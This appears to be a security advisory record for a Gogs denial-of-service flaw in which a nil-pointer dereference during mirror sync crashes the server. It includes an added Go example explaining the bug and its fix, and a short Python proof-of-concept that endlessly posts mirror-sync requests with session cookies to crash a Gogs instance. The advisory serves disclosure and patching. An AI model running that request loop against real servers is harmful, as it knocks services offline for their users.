Gogs has a Denial of Service issue

Basic information

  • GHSA ID: GHSA-cr88-6mqm-4g57
  • CVE ID: CVE-2026-22592
  • Severity: MEDIUM
  • Published: 2026-02-06T18:08:16Z
  • Source: GitHub Advisory

Vulnerability description

Summary

An authenticated user can cause a denial of service (DoS). If one of the repository's files is deleted before a mirror synchronization runs, the application crashes.

Details

If GetMirrorByRepoID fails, the error-logging path dereferences a nil pointer. This happens when the repository no longer exists: https://github.com/gogs/gogs/blob/4cc83c498b6ae59356a04912d68a932165bad5e6/internal/database/mirror.go#L333-L337. Whenever err != nil, m is always nil: https://github.com/gogs/gogs/blob/4cc83c498b6ae59356a04912d68a932165bad5e6/internal/database/mirror.go#L269-L278
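The bug class described above, as an added illustration that is not code from Gogs or from the advisory author: a lookup that returns (nil, err) on failure, an error path that reads a field of the nil result (and therefore panics), and the corrected error path that logs only values it still has, such as the repository ID. The Mirror and Repository types, the in-memory store and the sync functions are simplified stand-ins, not Gogs's own; the panic is recovered in the unsafe variant only so the two behaviours can be compared side by side.

```go
package main

import (
	"errors"
	"fmt"
)

// Repository and Mirror are simplified stand-ins for the Gogs records (hypothetical).
type Repository struct{ Name string }

type Mirror struct {
	RepoID int64
	Repo   *Repository
}

// ErrMirrorNotExist models the "repository no longer exists" failure.
var ErrMirrorNotExist = errors.New("mirror does not exist")

// store is a constructed stand-in for the database: repo 1 still has a mirror,
// repo 2 has been deleted before its sync ran.
var store = map[int64]*Mirror{
	1: {RepoID: 1, Repo: &Repository{Name: "gobypass403"}},
}

// getMirrorByRepoID follows the contract the advisory describes: whenever
// err != nil the returned *Mirror is nil.
func getMirrorByRepoID(repoID int64) (*Mirror, error) {
	m, ok := store[repoID]
	if !ok {
		return nil, ErrMirrorNotExist
	}
	return m, nil
}

// syncUnsafe reproduces the defect: the error path formats m.Repo.Name even
// though m is nil on every error, so a deleted repository panics the handler.
// The deferred recover only exists here to turn that crash into a returned error.
func syncUnsafe(repoID int64) (msg string, err error) {
	defer func() {
		if r := recover(); r != nil {
			err = fmt.Errorf("panic: %v", r)
		}
	}()
	m, err := getMirrorByRepoID(repoID)
	if err != nil {
		// BUG: m is nil here; m.Repo dereferences a nil pointer.
		return "", fmt.Errorf("get mirror for %s: %w", m.Repo.Name, err)
	}
	return "synced " + m.Repo.Name, nil
}

// syncSafe is the corrected form: the error path uses only the repoID the
// caller already holds and never touches the nil result.
func syncSafe(repoID int64) (string, error) {
	m, err := getMirrorByRepoID(repoID)
	if err != nil {
		return "", fmt.Errorf("get mirror for repo %d: %w", repoID, err)
	}
	return "synced " + m.Repo.Name, nil
}

func main() {
	for _, id := range []int64{1, 2} {
		msg, err := syncUnsafe(id)
		fmt.Printf("unsafe repo %d: msg=%q err=%v\n", id, msg, err)
		msg, err = syncSafe(id)
		fmt.Printf("safe   repo %d: msg=%q err=%v\n", id, msg, err)
	}
}
```

Running it shows the unsafe variant surviving repo 1 and panicking on the deleted repo 2, while the safe variant returns a wrapped ErrMirrorNotExist that callers can test with errors.Is. The general rule is the one the fix depends on: in a Go error branch, never read through a result whose documented contract is "nil on error".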

PoC

Repeatedly trigger mirror-sync on a repository while that repository is deleted. Python script that spams mirror-sync:

import requests

url = "http://gogs.lan:3000/superuser/gobypass403/settings"
headers = {
    "Cookie": "lang=en-US; i_like_gogs=fe32281ab84ae868; _csrf=UCw6xvqR-L7YLBMPjujwjywxy8s6MTc2NDc3NDQ2NDE1MzU5ODQ3Mg",
}

data = {
    "_csrf": "UCw6xvqR-L7YLBMPjujwjywxy8s6MTc2NDc3NDQ2NDE1MzU5ODQ3Mg",
    "action": "mirror-sync",
}

while True:
    print("syncing")
    response = requests.post(url, headers=headers, data=data)

Impact

Denial of service: the server crashes.

Affected scope

  • go:gogs.io/gogs (<= 0.13.3) → 0.13.4

CVSS score

  • CVSS v3: 6.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

CWE classification

  • CWE-862: Missing Authorization

EPSS score

  • EPSS: N/A

Extraction notes

  • Data source: GitHub Security Advisories Database
  • Confidence level: High (official vulnerability database)
  • Processed at: 2026-02-08T07:48:03.061025